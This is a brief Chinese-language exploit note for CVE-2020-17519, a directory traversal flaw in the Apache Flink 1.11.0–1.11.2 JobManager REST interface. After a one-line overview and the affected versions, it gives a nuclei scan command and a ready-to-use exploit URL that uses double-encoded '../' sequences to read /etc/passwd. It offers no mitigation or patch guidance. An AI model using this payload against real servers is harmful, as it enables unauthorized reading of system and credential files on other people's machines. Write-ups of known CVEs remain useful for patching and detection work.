Apache Flink jobmanager 目录遍历(CVE 2020 17519)
漏洞概述¶
Apache Flink 1.11.0中引入的一个更改,允许攻击者通过JobManager进程的REST接口读取JobManager本地文件系统上的任何文件。
影响范围¶
Apache Flink 1.11.0
Apache Flink 1.11.1
Apache Flink 1.11.2
POC¶
nuclei.exe -tags apache -t cves/ -stats -u http://test.com:8081
EXP¶
http://your-ip:8081/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd